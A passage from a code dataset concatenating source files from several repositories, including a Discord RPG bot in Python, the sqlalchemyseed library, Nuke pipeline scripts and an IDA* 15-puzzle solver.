self.versionLabel.setObjectName(u"versionLabel")
self.verticalLayout.addWidget(self.versionLabel)
self.labelAuthor = QLabel(AboutDialog)
self.labelAuthor.setObjectName(u"labelAuthor")
self.verticalLayout.addWidget(self.labelAuthor, 0, Qt.AlignRight)
self.retranslateUi(AboutDialog)
QMetaObject.connectSlotsByName(AboutDialog)
# setupUi
def retranslateUi(self, AboutDialog):
AboutDialog.setWindowTitle(QCoreApplication.translate("AboutDialog", u"About", None))
self.appLabel.setText(QCoreApplication.translate("AboutDialog", u"<html><head/><body><p align=\"center\">Class Genie</p></body></html>", None))
self.versionLabel.setText(QCoreApplication.translate("AboutDialog", u"versionLabel", None))
self.labelAuthor.setText(QCoreApplication.translate("AboutDialog", u"AuthorLabel", None))
# retranslateUi
```
|
{
"source": "jedymatt/simple-rpg",
"score": 2
}
|
#### File: simple-rpg/cogs/adventure.py
```python
import random
from random import randint
import discord
from discord import Colour
from discord import Embed
from discord.ext import commands
from discord.ext import menus
from sqlalchemy.exc import NoResultFound
from sqlalchemy.orm import noload, joinedload
from sqlalchemy.sql import func
from cogs.utils import images, errors
from cogs.utils import player as pl
from cogs.utils.character import BattleSimulator, NameAmount
from cogs.utils.character import adjust_hostile_enemy
from cogs.utils.character import level_up
from cogs.utils.character import next_exp
from cogs.utils.character import player_changed_attribute
from cogs.utils.character import random_boolean
from cogs.utils.paginator import EmbedListPage, LocationListPage
from cogs.utils.paginator import record_embed
from cogs.utils.query import get_player, get_hostile, get_modifier
from db import session
from models import Hostile, Loot, LocationLoot, ItemLoot
from models import Location
from models import Modifier
from models import Player
from models import PlayerItem
from models import User
class Adventure(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['go', 'travel', 'travelto', 'venture', 'ventureto'])
async def goto(self, ctx, *, location: str):
"""Travel to a specific location"""
author_id = ctx.author.id
try:
location = session.query(Location).filter(
func.lower(Location.name) == location.lower()
).one()
except NoResultFound:
raise commands.UserInputError(f"\"{location}\" not found, try again.")
if location is None:
raise commands.UserInputError('Location not found. Try again.')
player: Player = session.query(Player).options(
noload(Player.attribute),
noload(Player.items)
).join(User).filter(
User.discord_id == author_id
).one()
if player.level >= location.level_requirement:
player.location = location
else:
raise errors.LevelNotReached(f"Can't to venture to \"{location.name}\"")
await ctx.send('success')
@goto.error
async def goto_error(self, ctx, error):
if isinstance(error, errors.LevelNotReached):
embed = Embed(
colour=discord.Colour.red(),
title=error.args[0]
)
embed.set_author(
name=ctx.author.display_name,
icon_url=ctx.author.avatar_url
)
embed.description = "Your level is too low, and you might get hurt the during your travel. " \
"Don't worry! You can try again when you're strong enough."
await ctx.send(embed=embed)
elif isinstance(error, commands.UserInputError):
await ctx.send(error.args[0])
else:
raise error
@commands.command()
async def hunt(self, ctx: commands.Context):
"""Explore the surrounding"""
player = get_player(session, ctx.author.id)
# find IDs of Hostile(s) in the current location of the Player,
# then generate & select random hostile
hostile_ids = session.query(Hostile.id).join(Location).filter(
Location.id == player.location.id
).all()
random_hostile_id = random.choice(hostile_ids).id
enemy = get_hostile(session, random_hostile_id, make_transient_=True)
if player.level >= player.location.level_requirement:
# generate level in random +2 above level of player
new_level = random.randint(player.level, player.level + 2)
else:
# generate level in random -2 below level of level requirement
new_level = random.randint(player.location.level_requirement - 2,
player.location.level_requirement)
# 40% chance of hostile with modifier appearing
modifier = None
if random_boolean(0.40):
modifier_ids = session.query(Modifier.id).all()
modifier_id = random.choice(modifier_ids).id
modifier = get_modifier(session, modifier_id)
# adjust attribute of enemy according to its level
adjust_hostile_enemy(new_level, enemy, modifier)
# Battle simulation
# first attacker is Player
battle = BattleSimulator(player, enemy)
winner = battle.start()
# end simulation
# records of the battle
player_record = battle.character_record
enemy_record = battle.opponent_record
str_message = ''
result_embed = Embed(
title='Hunt Result:',
colour=discord.Colour.gold()
)
if winner is player:
str_message = 'You defeated the enemy!'
result_embed.add_field(
name='Rewards',
value="Exp +{}\nMoney +{}".format(
enemy.loot.exp, enemy.loot.money
),
inline=False
)
# reward exp and gold
player.money += enemy.loot.money
player.exp += enemy.loot.exp
rewards = []
# randomly generate a chance to receive drop item
for item_loot in enemy.loot.item_loots:
if random_boolean(item_loot.drop_chance):
random_amount = randint(item_loot.min, item_loot.max)
pl.add_item(player.items, item_loot.item, random_amount)
rewards.append(
NameAmount(
name=item_loot.item.name,
amount=random_amount
)
)
if len(rewards) != 0:
result_embed.add_field(
name='Items',
value="\n".join(f"{reward.name} +{reward.amount}" for reward in rewards),
inline=False
)
if player.exp >= next_exp(player.level):
old_level = player.level
raised_level = level_up(player)
raised_attribute = player_changed_attribute(old_level, player.level)
pl.player_scale_attribute(player.level, player.attribute)
raised_values = [
('New Level: {}', [player.level]),
('Max HP +{}', [raised_attribute.max_hp]),
('Strength +{}', [raised_attribute.strength]),
('Defense +{}', [raised_attribute.defense])
]
result_embed.add_field(
name=f"You leveled up by {raised_level}",
value="\n".join(value[0].format(*value[1]) for value in raised_values)
)
elif winner is enemy:
str_message = 'You fainted!'
else:
if battle.character_record.has_escaped:
str_message = 'You escaped!'
elif battle.opponent_record.has_escaped:
str_message = 'Enemy escaped!'
result_embed.description = str_message
result_embed.set_thumbnail(url=images.DEFAULT)
entries = [
result_embed,
record_embed('Performance', ctx.author.display_name, player, player_record,
thumbnail_url=ctx.author.avatar_url),
record_embed('Performance', enemy.name, enemy, enemy_record)
]
for entry in entries:
entry.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
pages = menus.MenuPages(
source=EmbedListPage(global_message=str_message, embeds=entries),
clear_reactions_after=True,
)
# db_session.commit()
await pages.start(ctx)
@commands.command(aliases=['places', 'areas'])
async def locations(self, ctx):
locations = session.query(Location).all()
pages = menus.MenuPages(source=LocationListPage(entries=locations),
clear_reactions_after=True)
await pages.start(ctx)
@commands.command()
# @commands.cooldown(1, 60, commands.BucketType.user)
async def gather(self, ctx):
"""Gather raw materials, sometimes fails, sometimes encounters mobs"""
player, loot = session.query(Player, Loot) \
.select_from(Player) \
.join(Location, Location.id == Player.location_id) \
.join(LocationLoot, Location.id == LocationLoot.location_id) \
.join(Loot, Loot.id == LocationLoot.loot_id) \
.join(User, User.player_id == Player.id) \
.options(joinedload(Player.location),
joinedload(Player.items).subqueryload(PlayerItem.item),
joinedload(Loot.item_loots).subqueryload(ItemLoot.item)) \
.filter(User.discord_id == ctx.author.id).one()
gains = [('Money', loot.money)]
player.money += loot.money
for item_loot in loot.item_loots:
success = random_boolean(item_loot.drop_chance)
if success:
item = item_loot.item
amount = randint(item_loot.min, item_loot.max)
gains.append((item.name, amount))
# add the item and amount to player.items
pl.add_item(player_items=player.items, item=item, amount=amount)
# declare embed
embed = Embed(
title='Obtained',
colour=Colour.green()
)
embed.set_author(name=ctx.author.display_name, icon_url=ctx.author.avatar_url)
embed.description = "\n".join(f"{gain[0]} +{gain[1]}" for gain in gains)
# send output
await ctx.send(embed=embed)
@gather.error
async def gather_error(self, ctx, error):
if isinstance(error, commands.CommandOnCooldown):
await ctx.send(error.args)
else:
raise error
def setup(bot: commands.Bot):
bot.add_cog(Adventure(bot))
```
#### File: simple-rpg/cogs/general.py
```python
from discord.ext import commands
from db.connector import session
# def query_player(user_id):
# """
# Finds user's character from database.
#
# Args:
# user_id: discord user id
#
# Returns:
# Character: Character that matches the user's id
#
# Raises:
# CharacterNotFound: If the character is not found in the database
# """
#
# result = session.query(Player).filter(User.discord_id == user_id).one()
#
# if result is None:
# raise CharacterNotFound('Character not found in the database.')
#
# return result
#
#
# def get_item(item_name: str, items):
# for item in items:
# if str(item.name).lower() == item_name.lower():
# return item
#
# return None
# def split_str_int(arg: str):
# """
#
# Splits the string into new string and integer.
# Default integer is 1 if not specified.
#
# Args:
# arg: string with any content followed by integer
#
# Returns: string and integer
# """
# arg = arg.split(' ')
# size = len(arg)
#
# integer = arg[size - 1]
#
# try:
# integer = int(integer)
# string = ' '.join(arg[:size - 1])
# except ValueError:
# integer = 1
# string = ' '.join(arg)
#
# return string, integer
class Adventurer(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.locations = None
self.item_plans = None
self.shop_items = None
# @commands.Cog.listener()
# async def on_ready(self):
# # query locations
# self.locations = session.query(Location).all()
#
# print('Locations loaded:', end=' ')
# print([location.name for location in self.locations])
#
# # self.item_plans = session.query(ItemPlan).all()
# # print('Loaded ItemPlans:')
# # for item_plan in self.item_plans:
# # print(item_plan.item)
# #
# # # load shop items
# # self.shop_items = session.query(ShopItem).all()
# # print('Loaded ShopItems:')
# # for shop_item in self.shop_items:
# # print(shop_item.item)
#
# @commands.command()
# async def attack(self, ctx):
# pass
#
# @commands.command()
# async def duel(self, ctx, mentioned_user):
# pass
#
# @commands.command()
# async def goto(self, ctx, *, location_name: str):
# """Go to another place"""
# author_id = ctx.author.id
# player = query_player(author_id)
#
# location_name = location_name.lower()
#
# for location in self.locations:
# if location_name == str(location.name).lower():
# player.location = location
#
# session.commit()
# @commands.command(aliases=['plan', 'plans'])
# async def item_plan(self, ctx):
# """Show list of craftable items"""
#
# embed = discord.Embed(
# title='Craft',
# colour=discord.Colour.purple()
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
#
# for item_plan in self.item_plans:
# str_materials = '\n'.join([f"{mat.amount} {mat.item.name}" for mat in item_plan.materials])
#
# embed.add_field(
# name=item_plan.item.name,
# value=str_materials,
# inline=False
# )
#
# await ctx.send(embed=embed)
# @commands.command()
# async def craft(self, ctx, *, arg: str):
# item = arg.lower()
# author_id = ctx.author.id
#
# player = query_player(author_id)
#
# item_plan: ItemPlan = get_item(item, self.item_plans)
#
# if item_plan:
#
# plan_mats = {} # create dictionary for the materials
# for mat in item_plan.materials:
# plan_mats[mat.name] = mat.amount
#
# char_items = {} # create dictionary for the player items
# for c_item in player.items:
# char_items[c_item.name] = c_item.amount
#
# if all(key in char_items for key in plan_mats.keys()):
# for name in plan_mats:
# char_amount = char_items[name]
#
# if char_amount < plan_mats[name]: # check if player item amount is less than the required amount
# raise InsufficientAmount('Required amount is not enough')
#
# # deduct amount from the required amount
# char_items[name] -= plan_mats[name]
#
# # after traversing the mats, copy remaining amounts of char_items to the player.items
# while char_items: # char_items is not empty
# for c_item in player.items:
# name = c_item.name
# if name in char_items:
# c_item.amount = char_items[name]
# del char_items[name]
#
# item = get_item(item_plan.item.name, player.items)
# if item:
# item.amount += 1
# else:
# player.items.append(PlayerItem(item=item_plan.item, amount=1))
#
# else:
# raise InsufficientItem('not enough materials')
# else:
# raise ItemNotFound('invalid item')
#
# session.commit()
# @commands.command(aliases=['loc', 'location', 'locations', 'place'])
# async def places(self, ctx: commands.Context):
# """Show places"""
# embed = discord.Embed(
# title='Places',
#
# colour=discord.Colour.purple()
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
#
# # _embed.set_thumbnail(url= map thumbnail)
#
# char = query_player(ctx.author.id)
#
# embed.add_field(
# name="Current Location",
# value=str(char.location.name if char.location else 'None'),
# inline=False
# )
#
# str_loc = '\n'.join([f"{location.name} - *{location.description}*" for location in self.locations])
#
# embed.add_field(
# name='All Places',
# value=str_loc
# )
#
# await ctx.send(embed=embed)
#
# @commands.command()
# async def gather(self, ctx):
# """Gather raw materials"""
# pass
#
# @commands.command()
# async def explore(self, ctx):
# """Explore the current area"""
#
# @commands.command()
# async def profile(self, ctx: commands.Context):
# """Show profile"""
# user_id = ctx.author.id
#
# # if user_id not in self.characters:
# # self.characters[user_id] = query_character(user_id)
#
# player = query_player(user_id)
#
# # Embedded format
# embed = discord.Embed(
# title=f"{ctx.author.name}'s profile",
# colour=discord.Colour.orange(),
# )
#
# embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
# # _embed.set_thumbnail(url= avatar logo)
#
# embed.add_field(
# name='Details',
# value="Level: {}\n"
# "Exp: {} / {}\n"
# "Location: {}".format(player.level,
# player.exp,
# player.next_level_exp(),
# player.location.name if player.location else None
# ),
# inline=False
# )
# embed.add_field(
# name='Stats',
# value="HP: {} / {}\n"
# "Strength: {}\n"
# "Defense: {}".format(player.current_hp,
# int(player.max_hp),
# int(player.strength),
# int(player.defense)),
# inline=False
# )
#
# embed.add_field(
# name='Others',
# value="Money: {}".format(player.money),
# inline=False
# )
#
# await ctx.send(embed=embed)
#
# @commands.command()
# async def heal(self, ctx):
# """Uses potion on the player's inventory"""
#
# @commands.command()
# async def daily(self, ctx):
# """Claim daily rewards, if already claimed show remaining time until next reward"""
#
# @commands.command()
# async def shop(self, ctx):
# """Shows list of items in the shop"""
# shop_items_string = '\n'.join([f"{item.name} cost:{item.money_value}" for item in self.shop_items])
#
# await ctx.send(shop_items_string)
# @commands.command()
# async def buy(self, ctx, *, item_name_amount: str):
#
# item_name, item_amount = split_str_int(item_name_amount)
#
# # if amount is not valid throw an error
# if item_amount <= 0:
# raise InvalidAmount('Amount reached zero or below zero.')
#
# # get user's player
# player = query_player(ctx.author.id)
#
# shop_item = get_item(item_name, self.shop_items)
#
# if shop_item:
# total_cost = shop_item.money_value * item_amount
#
# # check if money is enough before making transaction
# if total_cost > player.money:
# raise ValueError(f"Not enough money to buy '{item_name}'")
#
# # Deduct money
# player.money -= total_cost
#
# # check if item to be added is already in the character.items otherwise create object
# item = get_item(item_name, player.items)
# if item:
# item.amount += item_amount
# else:
# player.items.append(PlayerItem(item=shop_item, amount=item_amount))
# else:
# raise ItemNotFound
#
# await ctx.send('item added to inventory, new balance: {}'.format(player.money))
# session.commit()
#
# @buy.error
# async def buy_error(self, ctx, error):
# if isinstance(error, commands.MissingRequiredArgument):
# await self.shop(ctx)
#
# if isinstance(error, InvalidAmount):
# await ctx.send('invalid amount')
#
# if isinstance(error, ItemNotFound):
# await ctx.send('invalid item')
# @commands.command()
# async def sell(self, ctx, *, item_name_amount: str):
#
# item_name, item_amount = split_str_int(item_name_amount)
#
# # if amount is not valid throw an error
# if item_amount <= 0:
# raise InvalidAmount('Amount reached zero or below zero.')
#
# player = query_player(ctx.author.id)
#
# char_item: PlayerItem = get_item(item_name, player.items)
#
# if char_item:
#
# if char_item.item.is_sellable is False:
# raise ItemNotSellable
#
# if char_item.amount < item_amount:
# raise InsufficientAmount
#
# char_item.amount -= item_amount
#
# gain = char_item.item.money_value * item_amount
#
# # total gain is 80% of the calculated gain
# total_gain = int(gain * 0.8)
# player.money += total_gain
#
# await ctx.send('item sold, gained money: +{}'.format(total_gain))
# else:
# raise ItemNotFound
#
# session.commit()
#
# @sell.error
# async def sell_error(self, ctx, error):
# if isinstance(error, commands.MissingRequiredArgument):
# await ctx.send('item not specified')
#
# if isinstance(error, InvalidAmount):
# await ctx.send('invalid amount')
#
# if isinstance(error, ItemNotFound):
# await ctx.send('item not found')
#
# if isinstance(error, ItemNotSellable):
# await ctx.send('item not sellable')
#
# if isinstance(error, InsufficientAmount):
# await ctx.send('item amount is not enough')
@commands.command()
async def commit(self, ctx):
session.commit()
await ctx.send('done')
@commands.command()
async def flush(self, ctx):
session.flush()
await ctx.send('done')
@commands.command()
async def close(self, ctx):
session.close()
await ctx.send('done')
def setup(bot):
bot.add_cog(Adventurer(bot))
```
#### File: simple-rpg/cogs/inventory.py
```python
import random
import discord
from db import session
from discord.ext import commands
from cogs.utils.errors import ItemNotFound
from cogs.utils.stripper import strip_name_amount
from models import Armour
from models import Attribute
from models import Consumable
from models import Equipment
from models import EquipmentSlot
from models import Player
from models import PlayerItem
from models import User
from models import Weapon
# TODO: fix craft, blueprint, add
# Plan data in google sheets of the blueprint
class Inventory(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def items(self, ctx):
"""Show list of items"""
author_id = ctx.author.id
player = session.query(Player).join(User).filter(
User.discord_id == author_id
).one()
embed = discord.Embed(
title='Owned Items',
colour=discord.Colour.random()
)
for player_item in player.items:
if not isinstance(player_item.item, Equipment):
embed.add_field(
name=player_item.item.name,
value="+%s" % player_item.amount
)
await ctx.send(embed=embed)
@commands.command(aliases=['craftables', 'plans', 'plan'])
async def craftable(self, ctx: commands.Context):
"""Show list of craftable items"""
embed = discord.Embed(
title='Craftable Items with Materials',
colour=discord.Colour.purple()
)
embed.set_author(name=ctx.author.name, icon_url=ctx.author.avatar_url)
for item_plan in self.item_plans:
msg = '\n'.join([f"{mat.amount} {mat.item.name}" for mat in item_plan.materials])
embed.add_field(
name=item_plan.item.name,
value=msg
)
await ctx.send(content=f'**{ctx.author.name}**', embed=embed)
@commands.command()
async def craft(self, ctx: commands.Context, *, arg: str):
name, amount = strip_name_amount(arg)
author_id = ctx.author.id
# search for matched plan in plans
# item_plan = next((item_plan for item_plan in self.item_plans if name.lower() == item_plan.name.lower()), None)
try:
# search for matched plan in plans
item_plan = next(item_plan for item_plan in self.item_plans if name.lower() == item_plan.name.lower())
except StopIteration:
raise ItemNotFound('Item not found')
player = session.query(Player).filter(User.discord_id == author_id).one()
new_amounts = {}
success = True
lack_materials = []
for material in item_plan.materials:
# total amount of material
material_amount = material.amount * amount
# get player_item that matches material
player_item: PlayerItem = next(
(player_item for player_item in player.items if material.item == player_item.item), None)
if player_item:
if player_item.amount < material_amount:
success = False # raise an error or count how much is lacking
lack_materials.append({'item': player_item.name,
'lack': player_item.amount - material_amount
})
else:
new_amounts[material.item.name] = player_item.amount - material_amount
else:
success = False # no matched player_item in the plan_materials
lack_materials.append({'item': material.item.name,
'lack': - material_amount
})
if success: # if success, overwrite amounts
for player_item in player.items:
if player_item.item.name in new_amounts:
player_item.amount = new_amounts[player_item.item.name]
if item_plan.item not in player.items:
new_player_item = PlayerItem(item=item_plan.item, amount=amount)
player.items.append(new_player_item)
else:
item = next(item for item in player.items if item == item_plan.item)
item.amount += amount
await ctx.send('success')
else:
embed = discord.Embed(
title='Craft failed',
colour=discord.Colour.dark_red()
)
msg = '\n'.join(f"{lack['lack']} {lack['item']}" for lack in lack_materials)
embed.add_field(
name='Missing materials',
value=msg
)
await ctx.send(embed=embed)
@craft.error
async def craft_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send('Please specify the item:')
await self.craftable(ctx)
if isinstance(error, ItemNotFound):
await ctx.send('Invalid item')
raise error
@commands.command()
async def equip(self, ctx, *, arg: str):
name = arg.lower()
player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
try:
player_item = next(
player_item for player_item in player.items if
str(player_item.item.name).lower() == name
)
except StopIteration:
raise ValueError('No equipment found')
if not isinstance(player_item.item, Equipment):
raise ValueError('Item is not an equipment')
# # if not found throws sqlalchemy.orm.exc.NoResultFound
# equipment = session.query(Equipment).filter(PlayerItem.player_id == player.id).filter(
# func.lower(Equipment.name) == name.lower()
# ).one()
if player_item.amount == 0:
raise ValueError('Amount not enough')
if not player.equipment_set:
player.equipment_set = EquipmentSlot()
if isinstance(player_item.item, Weapon):
if player.equipment_set.weapon is not None:
player.attribute -= player.equipment_set.weapon.attribute
player.equipment_set.weapon = player_item.item
elif isinstance(player_item.item, Armour):
if player.equipment_set.shield is not None:
player.attribute -= player.equipment_set.shield.attribute
player.equipment_set.shield = player_item.item
player.attribute += player_item.item.attribute
player_item.amount -= 1
await ctx.send('equipped')
@commands.command()
async def equipped(self, ctx):
player: Player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
embed = discord.Embed(
title='Equipped',
colour=discord.Colour.random()
)
embed.add_field(name='Weapon',
value=player.equipment_set.weapon.name if player.equipment_set and player.equipment_set.weapon
else "None")
embed.add_field(name='Shield',
value=player.equipment_set.shield.name if player.equipment_set and player.equipment_set.shield
else "None")
await ctx.send(embed=embed)
@commands.command()
async def equipments(self, ctx):
author_id = ctx.author.id
player = session.query(Player).filter(User.discord_id == author_id).one()
embed = discord.Embed(
title='Owned Items',
colour=discord.Colour.random()
)
for player_item in player.items:
if isinstance(player_item.item, Equipment):
embed.add_field(
name=player_item.item.name,
value="+%s" % player_item.amount
)
await ctx.send(embed=embed)
@commands.command()
async def use(self, ctx, *, arg: str):
name, amount = strip_name_amount(arg)
player = session.query(Player).filter(User.discord_id == ctx.author.id).one()
try:
player_item: PlayerItem = next(
player_item for player_item in player.items if
str(player_item.item.name).lower() == name.lower())
except StopIteration:
raise ValueError('Item to use not found')
if not isinstance(player_item.item, Consumable):
raise ValueError('cannot apply non-consumable item')
if player_item.amount < amount:
raise ValueError('Not enough amount')
while amount != 0:
if player_item.item.is_random_attr:
item_attribute: Attribute = player_item.item.attribute
# get dict of Attribute's attributes, ignores sqlalchemy instance, and 0 values
attrs = item_attribute.attrs
chosen = random.choice(attrs)
item_value = item_attribute.__getattribute__(chosen)
player_attr_value = player.__getattribute__(chosen)
if float(item_value).is_integer():
if chosen == 'max_hp':
player.max_hp += item_value
else:
player.__setattr__(chosen, (item_value + player_attr_value))
else:
player.attribute.__setattr__(chosen, round((item_value * player_attr_value) + player_attr_value))
else:
player.current_hp += player_item.item.attribute.current_hp
player.max_hp += player_item.item.attribute.max_hp
player.strength += player_item.item.attribute.strength
player.defense += player_item.item.attribute.defense
player_item.amount -= 1
amount -= 1
await ctx.send('item is used successfully')
def setup(bot):
bot.add_cog(Inventory(bot))
```
#### File: cogs/utils/stripper.py
```python
def strip_name_amount(arg: str):
"""
Strip the name and the last position integer
Args:
arg: string
Returns:
string and integer with the default value 1
"""
strings = arg.split()
try:
first = ' '.join(strings[:-1])
second = int(strings[-1])
except (ValueError, IndexError):
first = ' '.join(strings)
second = 1
return first, second
```
#### File: simple-rpg/data/locations.temp.py
```python
import yaml
from sqlalchemyseed import Seeder
from db.connector import session
def load_entities_from_yaml(filepath):
with open(filepath, 'r') as f:
return yaml.safe_load(f.read())
entities = load_entities_from_yaml('locations.yaml')
seeder = Seeder()
seeder.seed(entities, session)
print(seeder.instances)
print(entities)
# yaml.dump(entities, open('locations.yaml', 'r+'), sort_keys=False)
# session.commit()
```
#### File: simple-rpg/data/seed_items.py
```python
import json
from models import Raw
def load_items():
with open('items.json') as _json_file:
items = []
for item in json.load(_json_file):
if item['type'] == 'raw':
items.append(
Raw(
**item
)
)
return items
# session.add_all(items)
# session.commit()
```
#### File: simple-rpg/data/seed_modifiers.py
```python
import json
from models import Attribute, Modifier
def load_modifiers():
with open('modifiers.json') as _json_file:
modifiers = []
for modifier in json.load(_json_file):
modifiers.append(
Modifier(
prefix=modifier['prefix'],
attribute=Attribute(
**modifier['attribute']
),
bonus_exp=modifier['bonus_exp'],
bonus_money=modifier['bonus_money']
)
)
return modifiers
# session.add_all(modifiers)
# session.commit()
```
|
{
"source": "jedymatt/sqlalchemyseed",
"score": 3
}
|
#### File: src/sqlalchemyseed/class_registry.py
```python
import importlib
from . import errors, util
def parse_class_path(class_path: str):
"""
Parse the path of the class the specified class
"""
try:
module_name, class_name = class_path.rsplit('.', 1)
except ValueError as error:
raise errors.ParseError(
'Invalid module or class input format.') from error
# if class_name not in classes:
try:
class_ = getattr(importlib.import_module(module_name), class_name)
except AttributeError as error:
raise errors.NotInModuleError(
f"{class_name} is not found in module {module_name}.") from error
if util.is_supported_class(class_):
return class_
raise errors.UnsupportedClassError(
f"'{class_name}' is an unsupported class")
class ClassRegistry:
"""
Register classes
"""
def __init__(self):
self._classes = {}
def register_class(self, class_path: str):
"""
:param class_path: module.class (str)
:return: registered class
"""
if class_path not in self._classes:
self._classes[class_path] = parse_class_path(class_path)
return self._classes[class_path]
def __getitem__(self, class_path: str):
return self._classes[class_path]
@property
def classes(self) -> tuple:
"""
Return tuple of registered classes
"""
return tuple(self._classes)
def clear(self):
"""
Clear registered classes
"""
self._classes.clear()
```
#### File: src/sqlalchemyseed/validator.py
```python
from . import errors, util
class Key:
def __init__(self, name: str, type_):
self.name = name
self.type_ = type_
@classmethod
def model(cls):
return cls('model', str)
@classmethod
def data(cls):
return cls('data', dict)
@classmethod
def filter(cls):
return cls('filter', dict)
def is_valid_type(self, entity):
return isinstance(entity, self.type_)
def __str__(self):
return self.name
def __eq__(self, o: object) -> bool:
if isinstance(o, self.__class__):
return self.name == o.name and self.type_ == o.type_
if isinstance(o, str):
return self.name == o
return False
def __hash__(self):
return hash(self.name)
def check_model_key(entity: dict, entity_is_parent: bool):
model = Key.model()
if model not in entity and entity_is_parent:
raise errors.MissingKeyError("'model' key is missing.")
# check type_
if model in entity and not model.is_valid_type(entity[model]):
raise errors.InvalidTypeError("'model' data should be 'string'.")
def check_max_length(entity: dict):
if len(entity) > 2:
raise errors.MaxLengthExceededError("Length should not exceed by 2.")
def check_source_key(entity: dict, source_keys: list) -> Key:
source_key: Key = next(
(sk for sk in source_keys if sk in entity),
None
)
# check if current keys has at least, data or filter key
if source_key is None:
raise errors.MissingKeyError(
f"Missing {', '.join(map(str, source_keys))} key(s).")
return source_key
def check_source_data(source_data, source_key: Key):
if not isinstance(source_data, dict) and not isinstance(source_data, list):
raise errors.InvalidTypeError(
f"Invalid type_, {str(source_key)} should be either 'dict' or 'list'.")
if isinstance(source_data, list) and len(source_data) == 0:
raise errors.EmptyDataError(
"Empty list, 'data' or 'filter' list should not be empty.")
def check_data_type(item, source_key: Key):
if not source_key.is_valid_type(item):
raise errors.InvalidTypeError(
f"Invalid type_, '{source_key.name}' should be '{source_key.type_}'")
class SchemaValidator:
def __init__(self, source_keys, ref_prefix):
self._source_keys = source_keys
self._ref_prefix = ref_prefix
def validate(self, entities):
self._pre_validate(entities, entity_is_parent=True)
def _pre_validate(self, entities: dict, entity_is_parent=True):
if not isinstance(entities, dict) and not isinstance(entities, list):
raise errors.InvalidTypeError(
"Invalid type, should be list or dict")
if len(entities) == 0:
return
if isinstance(entities, dict):
return self._validate(entities, entity_is_parent)
# iterate list
for entity in entities:
self._pre_validate(entity, entity_is_parent)
def _validate(self, entity: dict, entity_is_parent=True):
check_max_length(entity)
check_model_key(entity, entity_is_parent)
# get source key, either data or filter key
source_key = check_source_key(entity, self._source_keys)
source_data = entity[source_key]
check_source_data(source_data, source_key)
if isinstance(source_data, list):
for item in source_data:
check_data_type(item, source_key)
# check if item is a relationship attribute
self.check_attributes(item)
else:
# source_data is dict
# check if item is a relationship attribute
self.check_attributes(source_data)
def check_attributes(self, source_data: dict):
for _, value in util.iter_ref_kwargs(source_data, self._ref_prefix):
self._pre_validate(value, entity_is_parent=False)
def validate(entities, ref_prefix='!'):
SchemaValidator(source_keys=[Key.data()], ref_prefix=ref_prefix) \
.validate(entities=entities)
def hybrid_validate(entities, ref_prefix='!'):
SchemaValidator(source_keys=[Key.data(), Key.filter()], ref_prefix=ref_prefix) \
.validate(entities=entities)
```
|
{
"source": "jedypod/nuke-conf",
"score": 3
}
|
#### File: jedypod/nuke-conf/init.py
```python
import nuke
import os, errno
# The folder of this init.py file
base_path = os.path.dirname(__file__)
pdirs = ['scripts']
for pdir in pdirs:
nuke.pluginAddPath(os.path.join(base_path, pdir))
# Callbacks
#---------------------------------------------------------------------------------------------
# If a write directory does not exist, create it automatically.
def create_write_directory():
directory = nuke.callbacks.filenameFilter(os.path.dirname(nuke.filename(nuke.thisNode())))
if directory and not os.path.isdir(directory):
try:
os.makedirs(directory)
except (OSError, e):
if e.errno == 17:
pass
nuke.addBeforeRender(create_write_directory)
# Works around bug in node.dependent calls which sometimes return an empty list in error
# Only add callback if not in commandline render mode
def eval_deps():
nodes = nuke.allNodes()
if nodes:
_ = nodes[-1].dependent()
if '-X' not in nuke.rawArgs:
nuke.addOnScriptLoad(eval_deps)
```
#### File: scripts/nuketools/print_render_commands.py
```python
from __future__ import print_function
import nuke
nuke.menu('Nuke').addCommand('Render/Print Render Commands', 'print_render_commands.go(nuke.selectedNodes())', index=7)
def go(nodes):
print('#!/usr/bin/bash')
for n in nodes:
print('{0} -X {1} -F {2} --cont -f {3}'.format(
nuke.EXE_PATH, n.name(), n.frameRange(), nuke.root()['name'].getValue()))
```
|
{
"source": "Jed-Z/artificial-intelligence-lab",
"score": 3
}
|
#### File: E02_15puzzle/src/main.py
```python
import numpy as np
import datetime
def isGoal(node):
"""
Test if the given node (state) is the goal.
"""
goal = np.append(range(1, sidelen * sidelen), 0).reshape(sidelen, sidelen)
return (node == goal).all()
def h1(node):
"""
Heuristic function 1: using the number of misplaced tiles.
"""
goal = np.append(range(1, sidelen * sidelen), 0).reshape(sidelen, sidelen)
return sidelen * sidelen - np.count_nonzero(goal == node)
def h2(node):
"""
Heuristic function 2: using Manhattan distance.
"""
target = {}
count = 1
for i in range(sidelen):
for j in range(sidelen):
target[count] = (i, j)
count += 1
target[0] = (sidelen-1, sidelen-1)
total_distance = 0
for i in range(sidelen):
for j in range(sidelen):
val = node[i, j]
total_distance += abs(i - target[val][0]) + abs(j - target[val][1])
return total_distance
def ida_star(root):
"""
Do IDA* algorithm from node `root`.
"""
bound = h2(root) # initial bound
path = [root]
while True:
ret = search(path, 0, bound)
if ret == True:
return path
if ret == float('inf'):
return False
else:
bound = ret
def search(path, g, bound):
"""
Do the DFS.
"""
node = path[-1] # current node is the last node in the path
f = g + h2(node) # heuristic function
if f > bound:
return f
if isGoal(node):
return True
temp = np.where(node == 0) # find the blank
blank = (temp[0][0], temp[1][0]) # blank's position
succs = []
moves = [(0, -1), (0, 1), (-1, 0), (1, 0)] # up, down, left, right
for move in moves:
next_blank = tuple(np.sum([blank, move], axis=0))
if next_blank[0]>=0 and next_blank[0]<sidelen and next_blank[1]>=0 and next_blank[1]<sidelen:
succ = node.copy()
succ[blank], succ[next_blank] = succ[next_blank], succ[blank]
succs.append(succ)
_min = float('inf')
succs.sort(key=lambda x: h2(x))
for succ in succs:
if not any((succ == x).all() for x in path): # special syntax
path.append(succ)
t = search(path, g+1, bound)
if t == True:
return True
if t < _min:
_min = t
path.pop()
return _min
def makeActions(path):
"""
Constuct a list containing numbers to be moved in each step.
"""
if path == False:
raise ValueError('No solution!')
actions = []
